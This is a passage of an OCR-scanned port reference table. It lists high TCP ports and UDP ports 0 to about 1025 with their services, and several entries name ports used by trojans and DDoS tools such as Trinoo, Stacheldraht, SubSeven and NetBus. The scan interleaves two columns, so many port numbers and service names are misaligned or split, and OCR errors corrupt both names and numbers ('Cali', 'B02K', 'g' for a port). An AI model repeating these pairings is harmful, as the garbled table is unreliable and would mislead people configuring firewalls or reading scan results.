Ping Discovery Service 


TCP 


13820 


DSMCC Pass-Thru Messages 


TCP 


9600 


MICROMUSE-NCPW 


TCP 


13821 


DSMCC Download Protocol 


TCP 


9753 


rasadv 


TCP 


13822 


DSMCC Channel Change 


TCP 


9876 


Session Director 


Protocol 




TCP 


9888 


CYBORG Systems 


TCP 


14001 


ITU SCCP (SS7) 


TCP 


9898 


MonkeyCom 


TCP 


15104 


DDOS communication TCP 


TCP 


9899 


SCTP TUNNELING 


TCP 


16360 


netserialextl 


TCP 


9900 


IUA 


TCP 


16361 


netserialext2 


TCP 


9909 


domaintime 


TCP 


16367 


netserialext3 


TCP 


9950 


APCPCPLUSWIN1 


TCP 


16368 


netserialext4 


TCP 


9951 


APCPCPLUSWIN2 


TCP 


16660 


Stacheldraht distributed 


TCP 


9952 


APCPCPLUSWIN3 


attack tool 


client 


TCP 


9992 


Palace 


TCP 


16959 


Subseven DEFC0N8 2 . 1 


TCP 


9993 


Palace 


backdoor remote access tool 


TCP 


9994 


Palace 


TCP 


16991 


INTEL-RCI-MP 


TCP 


9995 


Palace 


TCP 


17007 


isode-dua 


TCP 


9996 


Palace 


TCP 


17219 


Chipper 


TCP 


9997 


Palace 


TCP 


18000 


Beckman Instruments Inc. 


TCP 


9998 


Distinct32 


TCP 


18181 


OPSEC CVP 


TCP 


9999 


distinct 


TCP 


18182 


OPSEC UFP 


TCP 


10000 


Network Data Management 


TCP 


18183 


OPSEC SAM 


Protocol 




TCP 


18184 


OPSEC LEA 


TCP 


10001 


queue 


TCP 


18185 


OPSEC OMI 


TCP 


10002 


poker 


TCP 


18187 


OPSEC ELA 


TCP 


10003 


gateway 


TCP 


18463 


AC Cluster 


TCP 


10004 


remp 


TCP 


18753 


Shaft distributed attack 


TCP 


10005 


Secure telnet 


tool 


handler —agent 


TCP 


10007 


MVS Capaci ty 


TCP 


18888 


APCNECMP 


TCP 


10012 


qmaster 


TCP 


19283 


Key Server for SASSAFRAS 


TCP 


10080 


Amanda 


TCP 


19315 


Key Shadow for SASSAFRAS 


TCP 


10082 


Amanda Indexing 


TCP 


19410 


hp—sco 


TCP 


10083 


Amanda Tape Indexing 


TCP 


19411 


hp-sca 


TCP 


10113 


NetlQ Endpoint 


TCP 


19412 


HP-SESSMON 


TCP 


10114 


NetlQ Qcheck 


TCP 


19541 


JCP Client 


TCP 


10115 


Ganymede Endpoint 


TCP 


20000 


DNP 


TCP 


10128 


BMC— PERFORM— SERVICE DAEMON 


TCP 


20005 


xcept4 (German Telekom's 


TCP 


10288 


Blocks 


CEPT 


videotext service) 


TCP 


10520 


Acid Shivers (Windows 


TCP 


20034 


NetBus 2 Pro (Windows 


Trojan ) 




Trojan) 




TCP 


11000 


IRISA 


TCP 


20432 


Shaft distributed attack 


TCP 


11001 


Metasys 


client 




TCP 


Hill 


Virai Computing Environment 


TCP 


20670 


Track 


(VCE) 




TCP 


20999 


At Hand MMP 


TCP 


11367 


ATM UHAS 


TCP 


21554 


(trojan) 


TCP 


11720 


h323 Cali Signal Alternate 


TCP 


21590 


VoFR Gateway 


TCP 


12000 


IBM Enterprise Extender SNA 


TCP 


21845 


webphone 


XID 


Exchange 


TCP 


21846 


NetSpeak Corp. Directory 


TCP 


12001 


IBM Enterprise Extender SNA 


Services 




COS 


Network Priority 


TCP 


21847 


NetSpeak Corp. Connection 


TCP 


12002 


IBM Enterprise Extender SNA 


Services 




COS 


High Priority 


TCP 


21848 


NetSpeak Corp. Automatic 


TCP 


12003 


IBM Enterprise Extender SNA 


Cali 


Distribution 


COS Medium Priority 
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21849 


NetSpeak Corp. Credit 


Processing System 


TCP 


22000 


SNAPenetlO 


TCP 


22001 


OptoControl 


TCP 


22273 


wnn6 


TCP 


22289 


Wnn6 (Chinese Input) 


TCP 


22305 


Wnn6 (Korean Input) 


TCP 


22321 


Wnn6 (Taiwanese Input) 


TCP 


22555 


Vocaltec Web Conference 


TCP 


22800 


Telerate Information 


Platform LAN 


TCP 


22951 


Telerate Information 


Platform WAN 


TCP 


24000 


med—ltp 


TCP 


24001 


med—fsp—rx 


TCP 


24002 


med—fsp—tx 


TCP 


24003 


med—supp 


TCP 


24004 


med—ovw 


TCP 


24005 


med—ci 


TCP 


24006 


med—net -svc 


TCP 


24386 


Intel RCI 


TCP 


24554 


BINKP 


TCP 


25000 


icl—twobasel 


TCP 


25001 


icl—twobase2 


TCP 


25002 


icl—twobase3 


TCP 


25003 


icl—twobase4 


TCP 


25004 


i ci —t wobase5 


TCP 


25005 


icl—twobase6 


TCP 


25006 


icl—twobase7 


TCP 


25007 


icl—twobase8 


TCP 


25008 


icl—twobase9 


TCP 


25009 


icl—twobasel 0 


TCP 


21554 


Girl friend (Windows Trojan) 


TCP 


25793 


Vocaltec Address Server 


TCP 


26000 


quake 


TCP 


26208 


wnn 6-ds 


TCP 


26274 


Delta Source (Windows 


Trojan) 




TCP 


27374 


Linux . Ramen . Worm (RedHat 


Linux) 




TCP 


27665 


Trinoo distributed attack 


tool 


Master 


server control port 


TCP 


27999 


TW Authentication/Key 


Distribution and 


TCP 


30100 


Netsphere (Windows Trojan) 


TCP 


30101 


Netsphere (Windows Trojan) 


TCP 


30102 


Netsphere (Windows Trojan) 


TCP 


31337 


B02K 


TCP 


31 785 


Hack—A—Tack (Windows 


Trojan) 




TCP 


31 787 


Hack—A—Tack (Windows 


Trojan) 




TCP 


32000 


XtraMail vi. 11 


TCP 


32768 


Filenet TMS 


TCP 


32769 


Filenet RPC 


TCP 


32770 


Filenet NCH 


TCP 


32771 


Sun RPC 


TCP 


32780 


RPC 


TCP 


33434 


traceroute use 


TCP 


34324 


Big Gluck (Windows Trojan) 


TCP 


36865 


KastenX Pipe 


TCP 


40421 


Master ' s Paradise (Windows 


Trojan) 




TCP 


40422 


Master ' s Paradise (Windows 


Trojan) 




TCP 


40423 


Master ' s Paradise (Windows 


Trojan) 




TCP 


40426 


Master ' s Paradise (Windows 


Trojan) 




TCP 


40841 


CSCP 


TCP 


43118 


reachout 


TCP 


43188 


Reachout 


TCP 


44818 


Rockwell Encapsulation 


TCP 


45678 


EBA PRISE 


TCP 


45966 


SSRServerMgr 


TCP 


47262 


Delta Source (Windows 



Trojan) 



TCP 


47557 


Databeam Corporation 


TCP 


47624 


Direct Play Server 


TCP 


47806 


ALC Protocol 


TCP 


47808 


Building Automation and 


Control Networks 


TCP 


48000 


Nimbus Controller 


TCP 


48001 


Nimbus Spooler 


TCP 


48002 


Nimbus Hub 


TCP 


48003 


Nimbus Gateway 


TCP 


54320 


Orifice 2000 (TCP) 


TCP 


65000 


distributed attack tool / 


Devil (Windows Trojan) 


TCP 


65301 


pcAnywhere-def 




Up to 


the TCP port list 



UDP Ports 



UDP 


0 


Reserved 


UDP 


l 


Port Service Multiplexer 


UDP 


2 


Management Utility 


UDP 


3 


Compression Process 


UDP 


4 


Unassigned 


UDP 


5 


Remote Job Entry 


UDP 


6 


Unassigned 


UDP 


7 




UDP 


g 


Unassigned 


UDP 


g 


Di scard 


UDP 


10 


Unassigned 


UDP 


11 


Active Users 


UDP 


12 


Unas signed 


UDP 


13 


Dayt ime 


UDP 


14 


Unas signed 


UDP 


15 


Unassigned 


UDP 


16 


Unassigned 


UDP 


17 


Quote of the Day 


UDP 


18 


Message Send Protocol 


UDP 


19 


Character Generator 


UDP 


20 


File Transfer [De fault Data] 


UDP 


21 


File Transfer [Control] 


UDP 


22 


SSH Remote Login Protocol 


UDP 


23 


Telnet 


UDP 


24 


any private mail system 


UDP 


25 


Simple Mail Transfer 


UDP 


26 


Unassigned 


UDP 


27 


NSW User System FE 


UDP 


28 


Unassigned 


UDP 


29 


MSG ICP 


UDP 


30 


Unassigned 


UDP 


31 


MSG Authentication 


UDP 


32 


Unassigned 


UDP 


33 


Display Support Protocol 


UDP 


34 


Unassigned 


UDP 


35 


any private printer server 


UDP 


36 


Unassigned 


UDP 


37 


Time 


UDP 


38 


Route Access Protocol 


UDP 


39 


Resource Location Protocol 


UDP 


40 


Unassigned 


UDP 


41 


Graphics 


UDP 


42 


Host Name Server 


UDP 


43 


Who Is 


UDP 


44 


MPM FLAGS Protocol 


UDP 


45 


Message Processing Module 


[recv] 




UDP 


46 


MPM [de fault send] 


UDP 


47 


NI FTP 


UDP 


48 


Digital Audit Daemon 


UDP 


49 


Login Host Protocol (TACACS) 


UDP 


50 


Remote Mail Checking Protocol 


UDP 


51 


IMP Logicai Address 


Maintenance 
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UDP 


52 


XNS Time Protocol 


UDP 


121 


Encore Expedited Remote 


UDP 


53 


Domain Name Server 


Pro. 


Cali 




UDP 


54 


XNS Clearinghouse 


UDP 


122 


SMAKYNET 


UDP 


55 


ISI Graphics Language 


UDP 


123 


Network Time Protocol 


UDP 


56 


XNS Authentication 


UDP 


124 


ANSA REX Trader 


UDP 


57 


any private terminal access 


UDP 


125 


Locus PC— Interface Net Map 


UDP 


58 


XNS Mail 


Ser 






UDP 


59 


any private file service 


UDP 


126 


Unisys Unitary Login 


UDP 


60 


Unassigned 


UDP 


127 


Locus PC— Interface Conn 


UDP 


61 


NI MAIL 


Server 




UDP 


62 


ACA Services 


UDP 


128 


GSS X License Veri fication 


UDP 


63 


whois++ 


UDP 


129 


Password Generator Protocol 


UDP 


64 


Communications Integrator (CI) 


UDP 


130 


cisco FNATIVE 


UDP 


65 


TACACS-Database Service 


UDP 


131 


cisco TNATIVE 


UDP 


66 


Oracle SQL* NET 


UDP 


132 


cisco SYSMAINT 


UDP 


67 


Bootstrap Protocol Server 


UDP 


133 


Statistics Service 


UDP 


68 


Bootstrap Protocol Client 


UDP 


134 


INGRES— NET Service 


UDP 


69 


Trivial File Transfer 


UDP 


135 


DCE endpoint resolution 


UDP 


70 


Gopher 


UDP 


136 


PROFILE Naming System 


UDP 


71 


Remote Job Service 


UDP 


137 


NETBIOS Name Service 


UDP 


72 


Remote Job Service 


UDP 


138 


NETBIOS Datagram Service 


UDP 


73 


Remote Job Service 


UDP 


139 


NETBIOS Session Service 


UDP 


74 


Remote Job Service 


UDP 


140 


EMFIS Data Service 


UDP 


75 


any private dial out service 


UDP 


141 


EMFIS Control Service 


UDP 


76 


Distributed External Object 


UDP 


142 


Britton-Lee IDM 


Store 




UDP 


143 


Internet Message Access 


UDP 


77 


any private RJE service 


Protocol 




UDP 


78 


vettcp 


UDP 


144 


Universal Management 


UDP 


79 


Finger 


Architecture 


UDP 


80 


World Wide Web HTTP 


UDP 


145 


UAAC Protocol 


UDP 


81 


H0STS2 Name Server 


UDP 


146 


ISO-IPO 


UDP 


82 


XFER Utility 


UDP 


147 


ISO-IP 


UDP 


83 


MIT ML Device 


UDP 


148 


Jargon 


UDP 


84 


Common Trace Facility 


UDP 


149 


AED 512 Emulation Service 


UDP 


85 


MIT ML Device 


UDP 


150 


SQL-NET 


UDP 


86 


Micro Focus Cobol 


UDP 


151 


HEMS 


UDP 


87 


any private terminal link 


UDP 


152 


Background File Transfer 


UDP 


88 


Kerberos 


Program 




UDP 


89 


SU/MIT Telnet Gateway 


UDP 


153 


SGMP 


UDP 


90 


DNSIX Securit Attribute Token 


UDP 


154 


NETSC 


Map 






UDP 


155 


NETSC 


UDP 


91 


MIT Dover Spooler 


UDP 


156 


SQL Service 


UDP 


92 


Network Printing Protocol 


UDP 


157 


KNET/VM Command/Message 


UDP 


93 


Device Control Protocol 


Protocol 




UDP 


94 


Tivoli Object Dispatcher 


UDP 


158 


PCMail Server 


UDP 


95 


SUPDUP 


UDP 


159 


NSS-Routing 


UDP 


96 


DIXIE Protocol Speci fication 


UDP 


160 


SGMP-TRAPS 


UDP 


97 


Swift Remote Virtural File 


UDP 


161 


SNMP 


Protocol 




UDP 


162 


SNMPTRAP 


UDP 


98 


TAC News 


UDP 


163 


CMIP/TCP Manager 


UDP 


99 


Metagram Relay 


UDP 


164 


CMIP/TCP Agent 


UDP 


101 


NIC Host Name Server 


UDP 


165 


Xerox 


UDP 


102 


ISO-TSAP Class 0 


UDP 


166 


Sirius Systems 


UDP 


103 


Genesis Point—to—Point Trans 


UDP 


167 


NAMP 


Net 






UDP 


168 


RSVD 


UDP 


104 


ACR-NEMA Digital Imag. & 


UDP 


169 


SENO 


Conati. 


300 


UDP 


170 


Network PostScript 


UDP 


105 


Mailbox Name Nameserver 


UDP 


171 


Network Innovations Multiplex 


UDP 


106 


3C0M—TSMUX 


UDP 


172 


Network Innovations CL/1 


UDP 


107 


Remote Telnet Service 


UDP 


173 


Xyplex 


UDP 


108 


SNA Gateway Access Server 


UDP 


174 


MAILQ 


UDP 


109 


Post Office Protocol - 


UDP 


175 


VMNET 


Version 2 


UDP 


176 


GENRAD—MUX 


UDP 


110 


Post Office Protocol - 


UDP 


177 


X Display Manager Control 


Version 3 


Protocol 




UDP 


111 


SUN Remote Procedure Cali 


UDP 


178 


NextStep Window Server 


UDP 


112 


McIDAS Data Transmission 


UDP 


179 


Border Gateway Protocol 


Protocol 




UDP 


180 


Intergraph 


UDP 


113 


Authentication Service 


UDP 


181 


Unify 


UDP 


114 


Audio News Multicast 


UDP 


182 


Unisys Audit SITP 


UDP 


115 


Simple File Transfer Protocol 


UDP 


183 


OCBinder 


UDP 


116 


ANSA REX Notify 


UDP 


184 


OCServer 


UDP 


117 


UUCP Path Service 


UDP 


185 


Remote-KIS 


UDP 


118 


SQL Services 


UDP 


186 


KIS Protocol 


UDP 


119 


Network News Transfer 


UDP 


187 


Application Communication 


Protocol 




Interface 




UDP 


120 


CFDPTKT 


UDP 


188 


Plus Five's MUMPS 
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UDP 189 


Queued File Transport 


UDP 


287 


K-BLOCK 


UDP 190 


Gateway Access Control 


UDP 


308 


Novastor Backup 


Protocol 




UDP 


309 


EntrustTime 


UDP 191 


Prospero Directory Service 


UDP 


310 


bhmds 


UDP 192 


OSU Network Monitoring System 


UDP 


311 


AppleShare IP WebAdmin 


UDP 193 


Spider Remote Monitoring 


UDP 


312 


VSLMP 


Protocol 




UDP 


313 


Magenta Logic 


UDP 194 


Internet Relay Chat Protocol 


UDP 


314 


Opalis Robot 


UDP 195 


DNSIX Network Level Module 


UDP 


315 


DPSI 


Audit 




UDP 


316 


decAuth 


UDP 196 


DNSIX Session Mgt Module 


UDP 


317 


Zannet 


Audit Redir 


UDP 


318 


PKIX TimeStamp 


UDP 197 


Directory Location Service 


UDP 


319 


PTP Event 


UDP 198 


Directory Location Service 


UDP 


320 


PTP General 


Monitor 




UDP 


321 


PIP 


UDP 199 


SMUX 


UDP 


322 


RTSPS 


UDP 200 


IBM System Resource 


UDP 


333 


Texar Security Port 


Controller 


UDP 


344 


Prospero Data Access Protocol 


UDP 201 


AppleTalk Routing Maintenance 


UDP 


345 


Perf Analysis Workbench 


UDP 202 


AppleTalk Name Binding 


UDP 


346 


Zebra server 


UDP 203 


AppleTalk Unused 


UDP 


347 


Fatmen Server 


UDP 204 


AppleTalk Echo 


UDP 


348 


Cabletron Management Protocol 


UDP 205 


AppleTalk Unused 


UDP 


349 


mftp 


UDP 206 


AppleTalk Zone Information 


UDP 


350 


MATIP Type A 


UDP 207 


AppleTalk Unused 


UDP 


351 


bhoetty 


UDP 208 


AppleTalk Unused 


UDP 


352 


bhoedap4 


UDP 209 


The Quick Mail Transfer 


UDP 


353 


NDSAUTH 


Protocol 




UDP 


354 


bh611 


UDP 210 


ANSI Z39.50 


UDP 


355 


DATEX-ASN 


UDP 211 


Texas Instruments 914C/G 


UDP 


356 


Cloanto Net 1 


Terminal 




UDP 


357 


bhevent 


UDP 212 


ATEXSSTR 


UDP 


358 


Shrinkwrap 


UDP 213 


IPX 


UDP 


359 


Tenebris Network Trace 


UDP 214 


VM PWSCS 


Service 




UDP 215 


Insignia Solutions 


UDP 


360 


scoi2odialog 


UDP 216 


Computer Associates Int ' 1 


UDP 


361 


Semantix 


License Server 


UDP 


362 


SRS Send 


UDP 217 


dBASE Unix 


UDP 


363 


RSVP Tunnel 


UDP 218 


Netix Message Posting 


UDP 


364 


Aurora CMGR 


Protocol 




UDP 


365 


DTK 


UDP 219 


Unisys ARPs 


UDP 


366 


ODMR 


UDP 220 


Interactive Mail Access 


UDP 


367 


Mort gageWare 


Protocol 


v3 


UDP 


368 


QbikGDP 


UDP 221 


Berkeley rlogind with SPX 


UDP 


369 


rpc2portmap 


auth 




UDP 


370 


codaauth2 


UDP 222 


Berkeley rshd with SPX auth 


UDP 


371 


Clearcase 


UDP 223 


Certificate Distribution 


UDP 


372 


Li stProcessor 


Center 




UDP 


373 


Legent Corporation 


UDP 224 


masqdialer 


UDP 


374 


Legent Corporation 


UDP 242 


Direct 


UDP 


375 


Hassle 


UDP 243 


Survey Measurement 


UDP 


376 


Amiga Envoy Network Inquiry 


UDP 244 


inbusiness 


Proto 




UDP 245 


LINK 


UDP 


377 


NEC Corporation 


UDP 246 


Display Systems Protocol 


UDP 


378 


NEC Corporation 


UDP 247 


SUBNTBCST_ TFTP 


UDP 


379 


TIA/EIA/IS-99 modem client 


UDP 248 


bhfhs 


UDP 


380 


TIA/EIA/IS-99 modem server 


UDP 256 


RAP 


UDP 


381 


hp performance data collector 


UDP 257 


Secure Electronic Transaction 


UDP 


382 


hp performance data managed 


UDP 258 


Yak Winsock Personal Chat 


node 






UDP 259 


Efficient Short Remote 


UDP 


383 


hp performance data alanti 


Operations 


manager 




UDP 260 


Openport 


UDP 


384 


A Remote Network Server 


UDP 261 


IIOP Name Service over 


System 




TLS/SSL 




UDP 


385 


IBM Application 


UDP 262 


Arcisdms 


UDP 


386 


ASA Message Router Object 


UDP 263 


HDAP 


Def. 






UDP 264 


BGMP 


UDP 


387 


Appletalk Update-Based 


UDP 265 


X-Bone CTL 


Routing Pro. 


UDP 266 


SCSI on ST 


UDP 


388 


Unidata LDM 


UDP 267 


Tobit David Service Layer 


UDP 


389 


Lightweight Directory Access 


UDP 268 


Tobit David Replica 


Protocol 




UDP 280 


HTTP-mgmt 


UDP 


390 


UIS 


UDP 281 


Personal Link 


UDP 


391 


SynOptics SNMP Relay Port 


UDP 282 


Cable Port A/X 


UDP 


392 


SynOptics Port Broker Port 


UDP 283 


rescap 


UDP 


393 


Data Interpretation System 


UDP 284 


corerjd 


UDP 


394 


EMBL Nucleic Data Transfer 


UDP 286 


FXP-1 


UDP 


395 


NETscout Control Protocol 
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UDP 


396 


Novell Netware over IP 


UDP 


465 


smtp protocol over TLS/SSL 


UDP 


397 


Multi Protocol Trans. Net. 


UDP 


466 


digital-vrc 


UDP 


398 


Kryptolan 


UDP 


467 


mylex—mapd 


UDP 


399 


ISO Transport Class 2 Non- 


UDP 


468 


proturis 


Control over TCP 


UDP 


469 


Radio Control Protocol 


UDP 


400 


Workstation Solutions 


UDP 


470 


scx-proxy 


UDP 


401 


Uninterruptible Power Supply 


UDP 


471 


Mondex 


UDP 


402 


Genie Protocol 


UDP 


472 


ljk-login 


UDP 


403 


decap 


UDP 


473 


hybrid-pop 


UDP 


404 


nced 


UDP 


474 


tn-tl-w2 


UDP 


405 


ncld 


UDP 


475 


tcpnethaspsrv 


UDP 


406 


Interactive Mail Support 


UDP 


476 


tn-tl-fdl 


Protocol 




UDP 


477 


ss7ns 


UDP 


407 


Timbuktu 


UDP 


478 


spsc 


UDP 


408 


Prospero Resource Manager 


UDP 


479 


iaf server 


Sys. 


Man . 




UDP 


480 


iafdbase 


UDP 


409 


Prospero Resource Manager 


UDP 


481 


Ph servi ce 


Node 


Man . 




UDP 


482 


bgs-nsi 


UDP 


410 


DECLadebug Remote Debug 


UDP 


483 


ulpnet 


Protocol 




UDP 


484 


Integra Software Management 


UDP 


411 


Remote MT Protocol 


Environment 


UDP 


412 


Trap Convention Port 


UDP 


485 


Air Soft Power Burst 


UDP 


413 


SMSP 


UDP 


486 


avian 


UDP 


414 


InfoSeek 


UDP 


487 


saft Simple Asynchronous Fi. 


UDP 


415 


BNet 


Transfer 




UDP 


416 


Silverplatter 


UDP 


488 


gss-HTTP 


UDP 


417 


Onmux 


UDP 


489 


nest-protocol 


UDP 


418 


Hyper-G 


UDP 


490 


micom—pfs 


UDP 


419 


Ariel 


UDP 


491 


go-login 


UDP 


420 


SMPTE 


UDP 


492 


Transport Independent 


UDP 


421 


Ariel 


Convergence for FNA 


UDP 


422 


Ariel 


UDP 


493 


Transport Independent 


UDP 


423 


IBM Operations Planning and 


Convergence for FNA 


Control Start 


UDP 


494 


POV-Ray 


UDP 


424 


IBM Operations Planning and 


UDP 


495 


intecourier 


Control Track 


UDP 


496 


PIM-RP-DISC 


UDP 


425 


ICAD 


UDP 


497 


dantz 


UDP 


426 


smart sdp 


UDP 


498 


slam 


UDP 


427 


Server Location 


UDP 


499 


ISO ILL Protocol 


UDP 


428 


OCS_CMU 


UDP 


500 


isakmp 


UDP 


429 


OCS^AMU 


UDP 


501 


STMF 


UDP 


430 


UTMPSD 


UDP 


502 


asa-appl-proto 


UDP 


431 


UTMPCD 


UDP 


503 


Intrinsa 


UDP 


432 


IASD 


UDP 


504 


citadel 


UDP 


433 


NNSP 


UDP 


505 


mailbox— lm 


UDP 


434 


MobilelP-Agent 


UDP 


506 


ohimsrv 


UDP 


435 


MobilIP-MN 


UDP 


507 


crs 


UDP 


436 


DNA—CML 


UDP 


508 


xvttp 


UDP 


437 


comscm 


UDP 


509 


snare 


UDP 


438 


dsfgw 


UDP 


510 


FirstClass Protocol 


UDP 


439 


dasp 


UDP 


511 


PassGo 


UDP 


440 


sgcp 


UDP 


512 


used by mail system to noti 


UDP 


441 


decvms—sysmgt 


users 




UDP 


442 


cvc^hostd 


UDP 


513 


maintains data bases showini 


UDP 


443 


HTTP protocol over TLS/SSL 


who ' s 




UDP 


444 


Simple Network Paging 


UDP 


514 


BSD syslogd 


Protocol 




UDP 


515 


spooler 


UDP 


445 


Microsoft-DS 


UDP 


516 


videotex 


UDP 


446 


DDM-RDB 


UDP 


517 


like tenex link but across 


UDP 


447 


DDM—RFM 


UDP 


518 


talkd 


UDP 


448 


DDM-SSL 


UDP 


519 


unixtime 


UDP 


449 


AS Server Mapper 


UDP 


520 


locai routing process (on 


UDP 


450 


TServer 


site) 




UDP 


451 


Cray Network Semaphore server 


UDP 


521 


ripng 


UDP 


452 


Cray SFS config server 


UDP 


522 


ULP 


UDP 


453 


CreativeServer 


UDP 


523 


IBM-DB2 


UDP 


454 


Content Server 


UDP 


524 


NCP 


UDP 


455 


CreativePartnr 


UDP 


525 


timeserver 


UDP 


456 


macon-udp 


UDP 


526 


newdate 


UDP 


457 


scohelp 


UDP 


527 


Stock IXChange 


UDP 


458 


appiè quick time 


UDP 


528 


Customer IXChange 


UDP 


459 


ampr—rcmd 


UDP 


529 


IRC-SERV 


UDP 


460 


skronk 


UDP 


530 


rpc 


UDP 


461 


Da t aRampSrv 


UDP 


531 


chat 


UDP 


462 


DataRampSrvSec 


UDP 


532 


readnews 


UDP 


463 


alpes 


UDP 


533 


for emergency broadcasts 


UDP 


464 


kpasswd 


UDP 


534 


MegaMedia Admin 
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UDP 


535 


iiop 


UDP 


611 


npmp-gui 


UDP 


536 


opalis-rdv 


UDP 


612 


HMMP Indication 


UDP 


537 


Networked Media Streaming 


UDP 


613 


HMMP Operation 


Protocol 




UDP 


614 


SSLshell 


UDP 


538 


gdomap 


UDP 


615 


Internet Configuration 


UDP 


539 


Apertus Technologies Load 


Manager 




Determination 


UDP 


616 


SCO System Administration 


UDP 


540 


uucpd 


Server 




UDP 


541 


uucp-rlogin 


UDP 


617 


SCO Desktop Administration 


UDP 


542 


commerce 


Server 




UDP 


543 


kerberos (v4/v5) 


UDP 


618 


DEI-ICDA 


UDP 


544 


krcmd 


UDP 


619 


Digital EVM 


UDP 


545 


appleqtcsrvr 


UDP 


620 


SCO WebServer Manager 


UDP 


546 


DHCPv6 Client 


UDP 


621 


ESCP 


UDP 


547 


DHCPv6 Server 


UDP 


622 


Collaborator 


UDP 


548 


AFP over TCP 


UDP 


623 


Aux Bus Shunt 


UDP 


549 


IDFP 


UDP 


624 


Crypto Admin 


UDP 


550 


new—who 


UDP 


625 


DEC DLM 


UDP 


551 


cybercash 


UDP 


626 


ASIA 


UDP 


552 


deviceshare 


UDP 


627 


PassGo Tivoli 


UDP 


553 


pirp 


UDP 


628 


QMQP 


UDP 


554 


Real Time Stream Control 


UDP 


629 


3Com AMP3 


Protocol 




UDP 


630 


RDA 


UDP 


555 


phAse Zero backdoor (Windows) 


UDP 


631 


IPP (Internet Printing 


/ dsf 




Protocol) 




UDP 


556 


rfs server 


UDP 


632 


bmpp 


UDP 


557 


openvms—sysipc 


UDP 


633 


Service Status update 


UDP 


558 


SDNSKMP 


(Sterling 


Software) 


UDP 


559 


TEEDTAP 


UDP 


634 


ginad 


UDP 


560 


rmonitord 


UDP 


635 


RLZ DBase 


UDP 


561 


monitor 


UDP 


636 


ldap protocol over TLS/SSL 


UDP 


562 


chcmd 


UDP 


637 


lanserver 


UDP 


563 


nntp protocol over TLS/SSL 


UDP 


638 


mcns-sec 


UDP 


564 


pian 9 file service 


UDP 


639 


MSDP 


UDP 


565 


whoami 


UDP 


640 


entrust-sps 


UDP 


566 


streettalk 


UDP 


641 


repcmd 


UDP 


567 


banyan-rpc 


UDP 


642 


ESRO-EMSDP VI. 3 


UDP 


568 


microsoft shuttle 


UDP 


643 


SANity 


UDP 


569 


microsoft rome 


UDP 


644 


dwr 


UDP 


570 


demon 


UDP 


645 


PSSC 


UDP 


571 


udemon 


UDP 


646 


LDP 


UDP 


572 


sonar 


UDP 


647 


DHCP Failover 


UDP 


573 


banyan—vip 


UDP 


648 


Registry Registrar Protocol 


UDP 


574 


FTP Software Agent System 


(RRP) 






UDP 


575 


VEMMI 


UDP 


649 


Aminet 


UDP 


576 


ipcd 


UDP 


650 


OBEX 


UDP 


577 


vnas 


UDP 


651 


IEEE MMS 


UDP 


578 


ipdd 


UDP 


652 


UDLR_DTCP 


UDP 


579 


decbsrv 


UDP 


653 


RepCmd 


UDP 


580 


SNTP HEARTBEAT 


UDP 


654 


AODV 


UDP 


581 


Bundle Discovery Protocol 


UDP 


655 


TINC 


UDP 


582 


SCC Security 


UDP 


656 


SPMP 


UDP 


583 


Philips Video- Conferencing 


UDP 


657 


RMC 


UDP 


584 


Key Server 


UDP 


658 


TenFold 


UDP 


585 


IMAP4+SSL 


UDP 


659 


URL Rendezvous 


UDP 


586 


Password Change 


UDP 


660 


MacOS Server Admin 


UDP 


587 


Submission 


UDP 


661 


HAP 


UDP 


588 


CAL 


UDP 


662 


PFTP 


UDP 


589 


EyeLink 


UDP 


663 


PureNoise 


UDP 


590 


TNS CML 


UDP 


664 


Secure Aux Bus 


UDP 


591 


FileMaker Inc. - HTTP 


UDP 


665 


Sun DR 


Alternate 




UDP 


666 


doom Id Software 


UDP 


592 


Eudora Set 


UDP 


667 


campaign contribution 


UDP 


593 


HTTP RPC Ep Map 


disclosures — SDR Technologies 


UDP 


594 


TPIP 


UDP 


668 


MeComm 


UDP 


595 


CAB Protocol 


UDP 


669 


MeRegister 


UDP 


596 


SMSD 


UDP 


670 


VACDSM-SWS 


UDP 


597 


PTC Name Service 


UDP 


671 


VACDSM-APP 


UDP 


598 


SCO Web Server Manager 3 


UDP 


672 


VPPS-QUA 


UDP 


599 


Aeolon Core Protocol 


UDP 


673 


CIMPLEX 


UDP 


600 


Sun IPC server 


UDP 


674 


ACAP 


UDP 


606 


Cray Unified Resource Manager 


UDP 


675 


DCTP 


UDP 


607 


nqs 


UDP 


676 


VPPS Via 


UDP 


608 


Sender—Initiated/Unsolicited 


UDP 


677 


Virtual Presence Protocol 


File 


Transfer 


UDP 


678 


GNU Generation Foundation NCP 


UDP 


609 


npmp—trap 


UDP 


679 


MRM 


UDP 


610 


npmp— locai 


UDP 


680 


entrust-aaas 
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UDP 


681 


entrust-aams 


UDP 


829 


PKIX-3 CA/RA 


UDP 


682 


XFR 


UDP 


873 


rsync 


UDP 


683 


CORBA IIOP 


UDP 


886 


ICL coNETion locate server 


UDP 


684 


CORBA IIOP SSL 


UDP 


887 


ICL coNETion server info 


UDP 


685 


MDC Port Mapper 


UDP 


888 


AccessBuilder 


UDP 


686 


Hardware Control Protocol 


UDP 


900 


OMG Initial Refs 


Wismar 




UDP 


901 


SMPNAMERES 


UDP 


687 


asipregistry 


UDP 


902 


IDEAFARM—CHAT 


UDP 


688 


REALM—RUSD 


UDP 


903 


IDEAFARM— CATCH 


UDP 


689 


NMAP 


UDP 


911 


xact -backup 


UDP 


690 


VATP 


UDP 


989 


ftp protocol data over 


UDP 


691 


MS Exchange Routing 


TLS/SSL 




UDP 


692 


Hyperwave—ISP 


UDP 


990 


ftp protocol control over 


UDP 


693 


connendp 


TLS/SSL 




UDP 


694 


ha-cluster 


UDP 


991 


Netnews Administration System 


UDP 


695 


IEEE-MMS-SSL 


UDP 


992 


telnet protocol over TLS/SSL 


UDP 


696 


RUSHD 


UDP 


993 


imap4 protocol over TLS/SSL 


UDP 


697 


UUIDGEN 


UDP 


994 


ire protocol over TLS/SSL 


UDP 


698 


OLSR 


UDP 


995 


pop3 protocol over TLS/SSL 


UDP 


704 


errlog copy/server daemon 


UDP 


996 


vsinet 


UDP 


705 


AgentX 


UDP 


997 


maitrd 


UDP 


706 


SILC 


UDP 


998 


puparp 


UDP 


707 


Borland DSJ 


UDP 


999 


Applix ac 


UDP 


709 


Entrust Key Management 


UDP 


1000 


ock 


Service Handler 


UDP 


1008 


Solaris 


UDP 


710 


Entrust Administration 


UDP 


1010 


surf 


Service Handler 


UDP 


1012 


This is rstatd on a openBSD 


UDP 


711 


Cisco TDP 


box 






UDP 


729 


IBM NetView DM/6000 


UDP 


1023 


Reserved 


Server /Client 


UDP 


1024 


Reserved 


UDP 


730 


IBM NetView DM/6000 send/tcp 


UDP 


1025 


network blackjack 


UDP 


731 


